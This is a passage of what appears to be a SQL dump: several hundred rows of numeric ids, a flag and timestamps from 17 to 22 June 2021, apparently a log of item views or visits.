21:16:39'),(25003,3005,1,'2021-06-17','2021-06-17 21:23:49'),(25004,1612,1,'2021-06-17','2021-06-17 21:31:07'),(25005,3290,1,'2021-06-17','2021-06-17 21:32:30'),(25006,3045,1,'2021-06-17','2021-06-17 21:33:21'),(25007,1870,1,'2021-06-17','2021-06-17 21:34:28'),(25008,1594,1,'2021-06-17','2021-06-17 21:38:52'),(25009,1596,1,'2021-06-17','2021-06-17 21:48:45'),(25010,1586,1,'2021-06-17','2021-06-17 21:49:50'),(25011,3034,1,'2021-06-17','2021-06-17 21:51:33'),(25012,2813,1,'2021-06-17','2021-06-17 21:58:55'),(25013,3285,1,'2021-06-17','2021-06-17 22:01:02'),(25014,3058,1,'2021-06-17','2021-06-17 22:08:57'),(25015,1728,1,'2021-06-17','2021-06-17 22:11:00'),(25016,1770,1,'2021-06-17','2021-06-17 22:12:17'),(25017,3710,1,'2021-06-17','2021-06-17 22:13:42'),(25018,3271,1,'2021-06-17','2021-06-17 22:19:02'),(25019,2410,1,'2021-06-17','2021-06-17 22:22:22'),(25020,2751,1,'2021-06-17','2021-06-17 22:26:40'),(25021,1728,1,'2021-06-17','2021-06-17 22:30:11'),(25022,1602,1,'2021-06-17','2021-06-17 22:31:42'),(25023,2617,1,'2021-06-17','2021-06-17 22:34:48'),(25024,2609,1,'2021-06-17','2021-06-17 22:39:03'),(25025,1766,1,'2021-06-17','2021-06-17 22:40:52'),(25026,1610,1,'2021-06-17','2021-06-17 22:46:58'),(25027,1614,1,'2021-06-17','2021-06-17 22:47:09'),(25028,1709,1,'2021-06-17','2021-06-17 22:49:16'),(25029,2911,1,'2021-06-17','2021-06-17 22:49:42'),(25030,80,1,'2021-06-17','2021-06-17 22:49:58'),(25031,469,1,'2021-06-17','2021-06-17 22:53:19'),(25032,1604,1,'2021-06-17','2021-06-17 23:06:49'),(25033,2395,1,'2021-06-17','2021-06-17 23:12:10'),(25034,3313,1,'2021-06-17','2021-06-17 23:13:31'),(25035,3253,1,'2021-06-17','2021-06-17 23:19:22'),(25036,1606,1,'2021-06-17','2021-06-17 23:20:15'),(25037,3479,1,'2021-06-17','2021-06-17 23:22:48'),(25038,3486,1,'2021-06-17','2021-06-17 23:24:40'),(25039,3674,1,'2021-06-17','2021-06-17 23:24:48'),(25040,3069,1,'2021-06-17','2021-06-17 23:29:35'),(25041,2156,1,'2021-06-17','2021-06-17 23:30:52'),(25042,3430,1,'2021-06-17','2021-06-17 23:39:39'),(25043,3541,1,'2021-06-17','2021-06-17 23:39:41'),(25044,2159,1,'2021-06-17','2021-06-17 23:46:48'),(25045,3278,1,'2021-06-17','2021-06-17 23:49:19'),(25046,1724,1,'2021-06-17','2021-06-17 23:49:27'),(25047,3714,1,'2021-06-17','2021-06-17 23:53:48'),(25048,1782,1,'2021-06-18','2021-06-18 00:00:24'),(25049,1782,1,'2021-06-18','2021-06-18 00:00:36'),(25050,3710,1,'2021-06-18','2021-06-18 00:02:33'),(25051,1604,1,'2021-06-18','2021-06-18 00:09:24'),(25052,3714,1,'2021-06-18','2021-06-18 00:10:18'),(25053,3069,1,'2021-06-18','2021-06-18 00:19:41'),(25054,3243,1,'2021-06-18','2021-06-18 00:19:42'),(25055,3127,1,'2021-06-18','2021-06-18 00:25:00'),(25056,3297,1,'2021-06-18','2021-06-18 00:30:09'),(25057,3229,1,'2021-06-18','2021-06-18 00:32:43'),(25058,3287,1,'2021-06-18','2021-06-18 00:35:23'),(25059,570,1,'2021-06-18','2021-06-18 00:40:01'),(25060,2609,1,'2021-06-18','2021-06-18 00:40:04'),(25061,472,1,'2021-06-18','2021-06-18 00:43:03'),(25062,1592,1,'2021-06-18','2021-06-18 00:50:10'),(25063,2150,1,'2021-06-18','2021-06-18 00:50:40'),(25064,1745,1,'2021-06-18','2021-06-18 00:53:03'),(25065,1582,1,'2021-06-18','2021-06-18 00:54:18'),(25066,2178,1,'2021-06-18','2021-06-18 01:00:24'),(25067,3498,1,'2021-06-18','2021-06-18 01:01:07'),(25068,3259,1,'2021-06-18','2021-06-18 01:03:13'),(25069,2775,1,'2021-06-18','2021-06-18 01:11:04'),(25070,2558,1,'2021-06-18','2021-06-18 01:12:46'),(25071,3099,1,'2021-06-18','2021-06-18 01:15:55'),(25072,1598,1,'2021-06-18','2021-06-18 01:20:56'),(25073,3058,1,'2021-06-18','2021-06-18 01:21:02'),(25074,2769,1,'2021-06-18','2021-06-18 01:23:03'),(25075,476,1,'2021-06-18','2021-06-18 01:31:41'),(25076,2989,1,'2021-06-18','2021-06-18 01:40:44'),(25077,1870,1,'2021-06-18','2021-06-18 01:44:48'),(25078,473,1,'2021-06-18','2021-06-18 01:44:59'),(25079,1726,1,'2021-06-18','2021-06-18 01:46:47'),(25080,1739,1,'2021-06-18','2021-06-18 01:50:41'),(25081,3034,1,'2021-06-18','2021-06-18 02:00:32'),(25082,468,1,'2021-06-18','2021-06-18 02:00:36'),(25083,1745,1,'2021-06-18','2021-06-18 02:03:19'),(25084,1594,1,'2021-06-18','2021-06-18 02:10:29'),(25085,1734,1,'2021-06-18','2021-06-18 02:12:30'),(25086,3269,1,'2021-06-18','2021-06-18 02:14:06'),(25087,3498,1,'2021-06-18','2021-06-18 02:20:37'),(25088,468,1,'2021-06-18','2021-06-18 02:20:47'),(25089,2809,1,'2021-06-18','2021-06-18 02:23:12'),(25090,1606,1,'2021-06-18','2021-06-18 02:24:43'),(25091,3694,1,'2021-06-18','2021-06-18 02:30:37'),(25092,3104,1,'2021-06-18','2021-06-18 02:33:13'),(25093,3307,1,'2021-06-18','2021-06-18 02:40:32'),(25094,1726,1,'2021-06-18','2021-06-18 02:46:47'),(25095,2490,1,'2021-06-18','2021-06-18 02:49:04'),(25096,1600,1,'2021-06-18','2021-06-18 02:50:05'),(25097,1600,1,'2021-06-18','2021-06-18 02:50:07'),(25098,1600,1,'2021-06-18','2021-06-18 02:50:08'),(25099,1741,1,'2021-06-18','2021-06-18 02:50:37'),(25100,1584,1,'2021-06-18','2021-06-18 02:52:21'),(25101,3257,1,'2021-06-18','2021-06-18 02:53:52'),(25102,3045,1,'2021-06-18','2021-06-18 03:00:33'),(25103,2965,1,'2021-06-18','2021-06-18 03:06:58'),(25104,1711,1,'2021-06-18','2021-06-18 03:10:53'),(25105,484,1,'2021-06-18','2021-06-18 03:20:48'),(25106,1780,1,'2021-06-18','2021-06-18 03:23:40'),(25107,477,1,'2021-06-18','2021-06-18 03:30:41'),(25108,2152,1,'2021-06-18','2021-06-18 03:30:43'),(25109,3534,1,'2021-06-18','2021-06-18 03:34:57'),(25110,2557,1,'2021-06-18','2021-06-18 03:40:52'),(25111,1602,1,'2021-06-18','2021-06-18 03:42:50'),(25112,3680,1,'2021-06-18','2021-06-18 03:50:46'),(25113,76,1,'2021-06-18','2021-06-18 03:54:06'),(25114,2911,1,'2021-06-18','2021-06-18 04:00:47'),(25115,2617,1,'2021-06-18','2021-06-18 04:00:48'),(25116,1705,1,'2021-06-18','2021-06-18 04:03:33'),(25117,3263,1,'2021-06-18','2021-06-18 04:13:11'),(25118,3263,1,'2021-06-18','2021-06-18 04:24:57'),(25119,2297,1,'2021-06-18','2021-06-18 04:30:32'),(25120,2411,1,'2021-06-18','2021-06-18 04:40:37'),(25121,1703,1,'2021-06-18','2021-06-18 04:44:56'),(25122,3249,1,'2021-06-18','2021-06-18 05:00:41'),(25123,2557,1,'2021-06-18','2021-06-18 05:10:30'),(25124,3124,1,'2021-06-18','2021-06-18 05:12:37'),(25125,106,1,'2021-06-18','2021-06-18 05:14:45'),(25126,1614,1,'2021-06-18','2021-06-18 05:20:39'),(25127,1596,1,'2021-06-18','2021-06-18 05:24:25'),(25128,3680,1,'2021-06-18','2021-06-18 05:31:01'),(25129,1749,1,'2021-06-18','2021-06-18 05:33:50'),(25130,1582,1,'2021-06-18','2021-06-18 05:41:12'),(25131,2704,1,'2021-06-18','2021-06-18 05:42:40'),(25132,1718,1,'2021-06-18','2021-06-18 05:44:05'),(25133,3030,1,'2021-06-18','2021-06-18 05:51:12'),(25134,1734,1,'2021-06-18','2021-06-18 05:53:19'),(25135,1588,1,'2021-06-18','2021-06-18 06:01:13'),(25136,2809,1,'2021-06-18','2021-06-18 06:01:19'),(25137,470,1,'2021-06-18','2021-06-18 06:03:17'),(25138,1614,1,'2021-06-18','2021-06-18 06:07:19'),(25139,2751,1,'2021-06-18','2021-06-18 06:11:25'),(25140,3127,1,'2021-06-18','2021-06-18 06:12:14'),(25141,2410,1,'2021-06-18','2021-06-18 06:13:35'),(25142,80,1,'2021-06-18','2021-06-18 06:27:58'),(25143,3705,1,'2021-06-18','2021-06-18 06:31:41'),(25144,2154,1,'2021-06-18','2021-06-18 06:31:44'),(25145,3534,1,'2021-06-18','2021-06-18 06:36:45'),(25146,1699,1,'2021-06-18','2021-06-18 06:42:04'),(25147,3430,1,'2021-06-18','2021-06-18 06:42:20'),(25148,3313,1,'2021-06-18','2021-06-18 06:44:05'),(25149,91,1,'2021-06-18','2021-06-18 06:46:14'),(25150,2813,1,'2021-06-18','2021-06-18 06:49:30'),(25151,3313,1,'2021-06-18','2021-06-18 06:54:08'),(25152,3698,1,'2021-06-18','2021-06-18 06:54:09'),(25153,570,1,'2021-06-18','2021-06-18 07:02:09'),(25154,3005,1,'2021-06-18','2021-06-18 07:02:11'),(25155,3287,1,'2021-06-18','2021-06-18 07:03:29'),(25156,2989,1,'2021-06-18','2021-06-18 07:04:15'),(25157,2804,1,'2021-06-18','2021-06-18 07:12:22'),(25158,1747,1,'2021-06-18','2021-06-18 07:12:26'),(25159,1544,1,'2021-06-18','2021-06-18 07:14:10'),(25160,1766,1,'2021-06-18','2021-06-18 07:15:12'),(25161,1594,1,'2021-06-18','2021-06-18 07:22:43'),(25162,1770,1,'2021-06-18','2021-06-18 07:24:04'),(25163,89,1,'2021-06-18','2021-06-18 07:24:50'),(25164,2165,1,'2021-06-18','2021-06-18 07:28:21'),(25165,2804,1,'2021-06-18','2021-06-18 07:32:53'),(25166,1586,1,'2021-06-18','2021-06-18 07:32:56'),(25167,3253,1,'2021-06-18','2021-06-18 07:33:20'),(25168,3710,1,'2021-06-18','2021-06-18 07:35:04'),(25169,3285,1,'2021-06-18','2021-06-18 07:36:32'),(25170,3109,1,'2021-06-18','2021-06-18 07:43:06'),(25171,68,1,'2021-06-18','2021-06-18 07:43:10'),(25172,2395,1,'2021-06-18','2021-06-18 07:45:59'),(25173,1612,1,'2021-06-18','2021-06-18 07:53:11'),(25174,1780,1,'2021-06-18','2021-06-18 07:53:13'),(25175,3124,1,'2021-06-18','2021-06-18 07:56:01'),(25176,2775,1,'2021-06-18','2021-06-18 08:03:06'),(25177,1604,1,'2021-06-18','2021-06-18 08:13:12'),(25178,2769,1,'2021-06-18','2021-06-18 08:18:00'),(25179,3541,1,'2021-06-18','2021-06-18 08:23:53'),(25180,3245,1,'2021-06-18','2021-06-18 08:24:14'),(25181,2813,1,'2021-06-18','2021-06-18 08:24:50'),(25182,2609,1,'2021-06-18','2021-06-18 08:41:09'),(25183,2309,1,'2021-06-18','2021-06-18 08:43:47'),(25184,1600,1,'2021-06-18','2021-06-18 08:44:00'),(25185,1606,1,'2021-06-18','2021-06-18 08:44:27'),(25186,470,1,'2021-06-18','2021-06-18 08:44:30'),(25187,3486,1,'2021-06-18','2021-06-18 08:51:37'),(25188,91,1,'2021-06-18','2021-06-18 08:53:54'),(25189,477,1,'2021-06-18','2021-06-18 09:10:52'),(25190,3104,1,'2021-06-18','2021-06-18 09:11:27'),(25191,3297,1,'2021-06-18','2021-06-18 09:16:26'),(25192,2419,1,'2021-06-18','2021-06-18 09:17:42'),(25193,3229,1,'2021-06-18','2021-06-18 09:20:03'),(25194,3249,1,'2021-06-18','2021-06-18 09:26:44'),(25195,3245,1,'2021-06-18','2021-06-18 09:29:41'),(25196,1774,1,'2021-06-18','2021-06-18 09:29:46'),(25197,3045,1,'2021-06-18','2021-06-18 09:31:46'),(25198,1766,1,'2021-06-18','2021-06-18 09:36:01'),(25199,1728,1,'2021-06-18','2021-06-18 09:36:32'),(25200,1877,1,'2021-06-18','2021-06-18 09:38:30'),(25201,3226,1,'2021-06-18','2021-06-18 09:44:29'),(25202,3691,1,'2021-06-18','2021-06-18 09:45:28'),(25203,106,1,'2021-06-18','2021-06-18 09:54:42'),(25204,2911,1,'2021-06-18','2021-06-18 09:57:11'),(25205,1582,1,'2021-06-18','2021-06-18 09:57:29'),(25206,3247,1,'2021-06-18','2021-06-18 09:57:49'),(25207,2411,1,'2021-06-18','2021-06-18 10:04:08'),(25208,1766,1,'2021-06-18','2021-06-18 10:05:57'),(25209,2769,1,'2021-06-18','2021-06-18 10:08:42'),(25210,80,1,'2021-06-18','2021-06-18 10:12:59'),(25211,2558,1,'2021-06-18','2021-06-18 10:13:49'),(25212,1600,1,'2021-06-18','2021-06-18 10:13:54'),(25213,1608,1,'2021-06-18','2021-06-18 10:21:36'),(25214,1774,1,'2021-06-18','2021-06-18 10:28:30'),(25215,1612,1,'2021-06-18','2021-06-18 10:28:36'),(25216,1870,1,'2021-06-18','2021-06-18 10:35:21'),(25217,3278,1,'2021-06-18','2021-06-18 10:35:56'),(25218,1604,1,'2021-06-18','2021-06-18 10:41:48'),(25219,3307,1,'2021-06-18','2021-06-18 10:47:27'),(25220,1600,1,'2021-06-18','2021-06-18 10:53:18'),(25221,3714,1,'2021-06-18','2021-06-18 10:54:21'),(25222,1600,1,'2021-06-18','2021-06-18 10:55:19'),(25223,468,1,'2021-06-18','2021-06-18 10:56:27'),(25224,1544,1,'2021-06-18','2021-06-18 10:57:02'),(25225,68,1,'2021-06-18','2021-06-18 10:57:03'),(25226,1606,1,'2021-06-18','2021-06-18 11:03:47'),(25227,1594,1,'2021-06-18','2021-06-18 11:03:58'),(25228,2751,1,'2021-06-18','2021-06-18 11:11:47'),(25229,2309,1,'2021-06-18','2021-06-18 11:14:26'),(25230,3034,1,'2021-06-18','2021-06-18 11:19:53'),(25231,1602,1,'2021-06-18','2021-06-18 11:54:44'),(25232,2156,1,'2021-06-18','2021-06-18 11:55:27'),(25233,80,1,'2021-06-18','2021-06-18 11:57:47'),(25234,1588,1,'2021-06-18','2021-06-18 11:59:19'),(25235,1604,1,'2021-06-18','2021-06-18 12:12:04'),(25236,1732,1,'2021-06-18','2021-06-18 12:19:08'),(25237,3092,1,'2021-06-18','2021-06-18 12:50:32'),(25238,2297,1,'2021-06-18','2021-06-18 13:49:26'),(25239,1586,1,'2021-06-18','2021-06-18 14:40:00'),(25240,2159,1,'2021-06-18','2021-06-18 15:43:53'),(25241,1594,1,'2021-06-18','2021-06-18 15:50:35'),(25242,3092,1,'2021-06-18','2021-06-18 16:11:47'),(25243,1598,1,'2021-06-18','2021-06-18 16:21:22'),(25244,2297,1,'2021-06-18','2021-06-18 16:28:02'),(25245,3265,1,'2021-06-18','2021-06-18 16:41:36'),(25246,2150,1,'2021-06-18','2021-06-18 16:41:50'),(25247,1594,1,'2021-06-18','2021-06-18 16:53:25'),(25248,1582,1,'2021-06-18','2021-06-18 18:38:24'),(25249,2965,1,'2021-06-18','2021-06-18 19:55:05'),(25250,1604,1,'2021-06-18','2021-06-18 21:50:57'),(25251,2154,1,'2021-06-18','2021-06-18 22:05:16'),(25252,1600,1,'2021-06-18','2021-06-18 22:25:07'),(25253,80,1,'2021-06-18','2021-06-18 22:26:18'),(25254,473,1,'2021-06-18','2021-06-18 22:26:58'),(25255,1544,1,'2021-06-18','2021-06-18 22:29:38'),(25256,80,1,'2021-06-18','2021-06-18 22:29:48'),(25257,1588,1,'2021-06-18','2021-06-18 22:56:11'),(25258,3486,1,'2021-06-18','2021-06-18 23:01:16'),(25259,2704,1,'2021-06-19','2021-06-19 00:04:44'),(25260,2704,1,'2021-06-19','2021-06-19 00:04:48'),(25261,2704,1,'2021-06-19','2021-06-19 00:05:34'),(25262,2704,1,'2021-06-19','2021-06-19 00:17:29'),(25263,2704,1,'2021-06-19','2021-06-19 00:20:10'),(25264,2297,1,'2021-06-19','2021-06-19 00:21:54'),(25265,1602,1,'2021-06-19','2021-06-19 02:16:57'),(25266,2297,1,'2021-06-19','2021-06-19 02:17:25'),(25267,91,1,'2021-06-19','2021-06-19 02:26:55'),(25268,2297,1,'2021-06-19','2021-06-19 02:28:24'),(25269,1602,1,'2021-06-19','2021-06-19 02:28:27'),(25270,3282,1,'2021-06-19','2021-06-19 03:24:19'),(25271,2154,1,'2021-06-19','2021-06-19 03:31:16'),(25272,570,1,'2021-06-19','2021-06-19 03:59:41'),(25273,2609,1,'2021-06-19','2021-06-19 04:14:54'),(25274,3251,1,'2021-06-19','2021-06-19 04:15:27'),(25275,2609,1,'2021-06-19','2021-06-19 04:16:29'),(25276,570,1,'2021-06-19','2021-06-19 04:16:42'),(25277,2609,1,'2021-06-19','2021-06-19 04:17:13'),(25278,1544,1,'2021-06-19','2021-06-19 05:42:42'),(25279,2297,1,'2021-06-19','2021-06-19 06:53:28'),(25280,1596,1,'2021-06-19','2021-06-19 07:03:24'),(25281,72,1,'2021-06-19','2021-06-19 07:04:37'),(25282,1596,1,'2021-06-19','2021-06-19 07:05:23'),(25283,1596,1,'2021-06-19','2021-06-19 07:05:45'),(25284,1596,1,'2021-06-19','2021-06-19 07:06:34'),(25285,3030,1,'2021-06-19','2021-06-19 08:04:02'),(25286,2297,1,'2021-06-19','2021-06-19 10:21:37'),(25287,1588,1,'2021-06-19','2021-06-19 10:57:37'),(25288,1586,1,'2021-06-19','2021-06-19 11:29:43'),(25289,1594,1,'2021-06-19','2021-06-19 12:12:05'),(25290,91,1,'2021-06-19','2021-06-19 12:32:36'),(25291,68,1,'2021-06-19','2021-06-19 12:35:29'),(25292,335,1,'2021-06-19','2021-06-19 12:35:49'),(25293,2503,1,'2021-06-19','2021-06-19 12:36:26'),(25294,84,1,'2021-06-19','2021-06-19 12:37:10'),(25295,68,1,'2021-06-19','2021-06-19 12:38:41'),(25296,76,1,'2021-06-19','2021-06-19 12:38:53'),(25297,80,1,'2021-06-19','2021-06-19 12:39:07'),(25298,1588,1,'2021-06-19','2021-06-19 12:45:00'),(25299,2154,1,'2021-06-19','2021-06-19 12:53:13'),(25300,80,1,'2021-06-19','2021-06-19 13:01:38'),(25301,1544,1,'2021-06-19','2021-06-19 14:03:38'),(25302,1592,1,'2021-06-19','2021-06-19 14:14:23'),(25303,1600,1,'2021-06-19','2021-06-19 14:14:53'),(25304,1582,1,'2021-06-19','2021-06-19 14:16:53'),(25305,1600,1,'2021-06-19','2021-06-19 14:17:14'),(25306,1592,1,'2021-06-19','2021-06-19 14:17:37'),(25307,1602,1,'2021-06-19','2021-06-19 15:17:14'),(25308,1588,1,'2021-06-19','2021-06-19 15:47:02'),(25309,1588,1,'2021-06-19','2021-06-19 16:09:55'),(25310,2154,1,'2021-06-19','2021-06-19 16:27:00'),(25311,3109,1,'2021-06-19','2021-06-19 16:27:46'),(25312,68,1,'2021-06-19','2021-06-19 16:38:15'),(25313,1606,1,'2021-06-19','2021-06-19 17:14:56'),(25314,1586,1,'2021-06-19','2021-06-19 18:07:21'),(25315,2617,1,'2021-06-19','2021-06-19 18:08:49'),(25316,1586,1,'2021-06-19','2021-06-19 18:09:56'),(25317,1598,1,'2021-06-19','2021-06-19 18:37:55'),(25318,1598,1,'2021-06-19','2021-06-19 18:39:26'),(25319,3079,1,'2021-06-19','2021-06-19 18:43:39'),(25320,1606,1,'2021-06-19','2021-06-19 22:35:43'),(25321,2297,1,'2021-06-19','2021-06-19 22:42:04'),(25322,1544,1,'2021-06-19','2021-06-19 22:56:54'),(25323,1594,1,'2021-06-19','2021-06-19 22:57:09'),(25324,1594,1,'2021-06-19','2021-06-19 22:57:17'),(25325,1544,1,'2021-06-19','2021-06-19 22:58:45'),(25326,2297,1,'2021-06-20','2021-06-20 02:16:10'),(25327,3117,1,'2021-06-20','2021-06-20 04:07:47'),(25328,2154,1,'2021-06-20','2021-06-20 04:14:17'),(25329,1592,1,'2021-06-20','2021-06-20 04:37:16'),(25330,72,1,'2021-06-20','2021-06-20 04:43:12'),(25331,72,1,'2021-06-20','2021-06-20 04:47:06'),(25332,1592,1,'2021-06-20','2021-06-20 04:47:10'),(25333,1544,1,'2021-06-20','2021-06-20 06:14:34'),(25334,2801,1,'2021-06-20','2021-06-20 08:34:36'),(25335,3282,1,'2021-06-20','2021-06-20 09:01:06'),(25336,1602,1,'2021-06-20','2021-06-20 10:23:58'),(25337,68,1,'2021-06-20','2021-06-20 10:24:12'),(25338,1606,1,'2021-06-20','2021-06-20 10:42:04'),(25339,1602,1,'2021-06-20','2021-06-20 10:49:17'),(25340,2154,1,'2021-06-20','2021-06-20 10:52:40'),(25341,1606,1,'2021-06-20','2021-06-20 11:08:16'),(25342,2457,1,'2021-06-20','2021-06-20 11:50:07'),(25343,2297,1,'2021-06-20','2021-06-20 12:29:08'),(25344,1598,1,'2021-06-20','2021-06-20 12:32:24'),(25345,1598,1,'2021-06-20','2021-06-20 12:37:03'),(25346,1598,1,'2021-06-20','2021-06-20 13:01:49'),(25347,1586,1,'2021-06-20','2021-06-20 13:51:53'),(25348,1586,1,'2021-06-20','2021-06-20 13:52:50'),(25349,68,1,'2021-06-20','2021-06-20 13:53:00'),(25350,1586,1,'2021-06-20','2021-06-20 14:02:07'),(25351,2704,1,'2021-06-20','2021-06-20 14:41:08'),(25352,2297,1,'2021-06-20','2021-06-20 15:37:50'),(25353,1586,1,'2021-06-20','2021-06-20 17:09:13'),(25354,1586,1,'2021-06-20','2021-06-20 17:09:13'),(25355,2297,1,'2021-06-20','2021-06-20 17:16:28'),(25356,1586,1,'2021-06-20','2021-06-20 17:27:29'),(25357,1594,1,'2021-06-20','2021-06-20 17:45:41'),(25358,1594,1,'2021-06-20','2021-06-20 17:48:49'),(25359,2152,1,'2021-06-20','2021-06-20 18:09:32'),(25360,1586,1,'2021-06-20','2021-06-20 18:29:31'),(25361,1586,1,'2021-06-20','2021-06-20 18:29:58'),(25362,2154,1,'2021-06-20','2021-06-20 20:06:57'),(25363,1594,1,'2021-06-20','2021-06-20 21:00:40'),(25364,1606,1,'2021-06-20','2021-06-20 21:10:38'),(25365,2956,1,'2021-06-20','2021-06-20 21:44:09'),(25366,1582,1,'2021-06-20','2021-06-20 21:50:08'),(25367,2297,1,'2021-06-20','2021-06-20 22:06:11'),(25368,1586,1,'2021-06-20','2021-06-20 22:33:36'),(25369,2297,1,'2021-06-21','2021-06-21 01:31:31'),(25370,1602,1,'2021-06-21','2021-06-21 01:52:14'),(25371,2154,1,'2021-06-21','2021-06-21 02:42:03'),(25372,478,1,'2021-06-21','2021-06-21 02:53:14'),(25373,478,1,'2021-06-21','2021-06-21 03:23:14'),(25374,474,1,'2021-06-21','2021-06-21 03:36:49'),(25375,473,1,'2021-06-21','2021-06-21 03:38:23'),(25376,473,1,'2021-06-21','2021-06-21 03:40:35'),(25377,473,1,'2021-06-21','2021-06-21 05:01:00'),(25378,1720,1,'2021-06-21','2021-06-21 05:01:35'),(25379,1586,1,'2021-06-21','2021-06-21 07:36:38'),(25380,1766,1,'2021-06-21','2021-06-21 09:43:30'),(25381,1602,1,'2021-06-21','2021-06-21 10:30:50'),(25382,1602,1,'2021-06-21','2021-06-21 10:31:18'),(25383,1602,1,'2021-06-21','2021-06-21 10:32:59'),(25384,80,1,'2021-06-21','2021-06-21 10:33:16'),(25385,80,1,'2021-06-21','2021-06-21 10:33:39'),(25386,1602,1,'2021-06-21','2021-06-21 10:33:58'),(25387,1586,1,'2021-06-21','2021-06-21 10:42:06'),(25388,1606,1,'2021-06-21','2021-06-21 10:53:12'),(25389,1594,1,'2021-06-21','2021-06-21 10:57:37'),(25390,1594,1,'2021-06-21','2021-06-21 10:58:57'),(25391,1592,1,'2021-06-21','2021-06-21 11:02:22'),(25392,1592,1,'2021-06-21','2021-06-21 11:02:25'),(25393,1592,1,'2021-06-21','2021-06-21 11:02:25'),(25394,1592,1,'2021-06-21','2021-06-21 11:02:38'),(25395,1582,1,'2021-06-21','2021-06-21 11:12:25'),(25396,1594,1,'2021-06-21','2021-06-21 11:17:10'),(25397,2297,1,'2021-06-21','2021-06-21 11:23:14'),(25398,2813,1,'2021-06-21','2021-06-21 12:12:47'),(25399,1594,1,'2021-06-21','2021-06-21 12:41:31'),(25400,1544,1,'2021-06-21','2021-06-21 12:54:18'),(25401,1724,1,'2021-06-21','2021-06-21 12:58:12'),(25402,1602,1,'2021-06-21','2021-06-21 13:09:55'),(25403,1602,1,'2021-06-21','2021-06-21 13:15:27'),(25404,1594,1,'2021-06-21','2021-06-21 13:26:52'),(25405,76,1,'2021-06-21','2021-06-21 14:21:20'),(25406,3243,1,'2021-06-21','2021-06-21 14:49:38'),(25407,1594,1,'2021-06-21','2021-06-21 15:39:50'),(25408,1544,1,'2021-06-21','2021-06-21 15:41:42'),(25409,1606,1,'2021-06-21','2021-06-21 15:54:31'),(25410,1718,1,'2021-06-21','2021-06-21 16:12:25'),(25411,87,1,'2021-06-21','2021-06-21 17:08:50'),(25412,76,1,'2021-06-21','2021-06-21 17:09:15'),(25413,2503,1,'2021-06-21','2021-06-21 17:11:08'),(25414,72,1,'2021-06-21','2021-06-21 17:11:30'),(25415,89,1,'2021-06-21','2021-06-21 17:34:16'),(25416,1614,1,'2021-06-21','2021-06-21 17:34:41'),(25417,89,1,'2021-06-21','2021-06-21 17:35:03'),(25418,3083,1,'2021-06-21','2021-06-21 17:35:09'),(25419,89,1,'2021-06-21','2021-06-21 17:35:36'),(25420,1612,1,'2021-06-21','2021-06-21 17:35:47'),(25421,89,1,'2021-06-21','2021-06-21 17:36:06'),(25422,1718,1,'2021-06-21','2021-06-21 18:35:47'),(25423,1718,1,'2021-06-21','2021-06-21 18:36:00'),(25424,1718,1,'2021-06-21','2021-06-21 18:36:46'),(25425,1610,1,'2021-06-21','2021-06-21 18:50:05'),(25426,2457,1,'2021-06-21','2021-06-21 19:07:03'),(25427,2159,1,'2021-06-21','2021-06-21 19:19:53'),(25428,2159,1,'2021-06-21','2021-06-21 19:20:33'),(25429,68,1,'2021-06-21','2021-06-21 19:20:46'),(25430,2159,1,'2021-06-21','2021-06-21 19:22:16'),(25431,1606,1,'2021-06-21','2021-06-21 19:37:59'),(25432,1606,1,'2021-06-21','2021-06-21 20:03:00'),(25433,2457,1,'2021-06-21','2021-06-21 20:03:06'),(25434,108,1,'2021-06-21','2021-06-21 20:05:44'),(25435,2297,1,'2021-06-21','2021-06-21 20:45:44'),(25436,108,1,'2021-06-21','2021-06-21 21:06:06'),(25437,2154,1,'2021-06-21','2021-06-21 21:06:10'),(25438,3285,1,'2021-06-21','2021-06-21 22:24:02'),(25439,2178,1,'2021-06-21','2021-06-21 22:41:30'),(25440,2297,1,'2021-06-21','2021-06-21 22:53:27'),(25441,2154,1,'2021-06-21','2021-06-21 23:03:28'),(25442,2457,1,'2021-06-21','2021-06-21 23:08:07'),(25443,80,1,'2021-06-21','2021-06-21 23:12:02'),(25444,1737,1,'2021-06-21','2021-06-21 23:35:06'),(25445,1544,1,'2021-06-21','2021-06-21 23:52:21'),(25446,1606,1,'2021-06-22','2021-06-22 00:26:33'),(25447,1718,1,'2021-06-22','2021-06-22 00:28:39'),(25448,1722,1,'2021-06-22','2021-06-22 00:30:24'),(25449,1718,1,'2021-06-22','2021-06-22 01:19:44'),(25450,1598,1,'2021-06-22','2021-06-22 02:22:03'),(25451,2457,1,'2021-06-22','2021-06-22 03:43:47'),(25452,3079,1,'2021-06-22','2021-06-22 04:13:44'),(25453,3265,1,'2021-06-22','2021-06-22 04:43:46'),(25454,1718,1,'2021-06-22','2021-06-22 06:45:28'),(25455,1778,1,'2021-06-22','2021-06-22 08:43:53'),(25456,2904,1,'2021-06-22','2021-06-22 09:01:24'),(25457,1582,1,'2021-06-22','2021-06-22 09:47:03'),(25458,1766,1,'2021-06-22','2021-06-22 10:01:20'),(25459,2297,1,'2021-06-22','2021-06-22 10:21:19'),(25460,76,1,'2021-06-22','2021-06-22 10:26:27'),(25461,1608,1,'2021-06-22','2021-06-22 10:37:21'),(25462,2297,1,'2021-06-22','2021-06-22 10:41:41'),(25463,2704,1,'2021-06-22','2021-06-22 11:15:32'),(25464,76,1,'2021-06-22','2021-06-22 11:18:51'),(25465,2154,1,'2021-06-22','2021-06-22 11:31:24'),(25466,1582,1,'2021-06-22','2021-06-22 11:33:03'),(25467,1582,1,'2021-06-22','2021-06-22 11:38:52'),(25468,1598,1,'2021-06-22','2021-06-22 12:24:43'),(25469,1602,1,'2021-06-22','2021-06-22 12:27:58'),(25470,2410,1,'2021-06-22','2021-06-22 12:50:19'),(25471,3680,1,'2021-06-22','2021-06-22 13:16:45'),(25472,1602,1,'2021-06-22','2021-06-22 13:38:58'),(25473,2154,1,'2021-06-22','2021-06-22 13:42:31'),(25474,3030,1,'2021-06-22','2021-06-22 13:47:30'),(25475,3030,1,'2021-06-22','2021-06-22 13:55:47'),(25476,3030,1,'2021-06-22','2021-06-22 13:57:04'),(25477,89,1,'2021-06-22','2021-06-22 13:57:15'),(25478,1544,1,'2021-06-22','2021-06-22 13:57:25'),(25479,3724,1,'2021-06-22','2021-06-22 14:20:06'),(25480,3742,1,'2021-06-22','2021-06-22 14:20:16'),(25481,3735,1,'2021-06-22','2021-06-22 14:20:23'),(25482,1612,1,'2021-06-22','2021-06-22 14:29:14'),(25483,3731,1,'2021-06-22','2021-06-22 14:43:25'),(25484,3226,1,'2021-06-22','2021-06-22 14:47:01'),(25485,3742,1,'2021-06-22','2021-06-22 14:47:36'),(25486,1602,1,'2021-06-22','2021-06-22 15:04:55'),(25487,1728,1,'2021-06-22','2021-06-22 15:05:54'),(25488,1586,1,'2021-06-22','2021-06-22 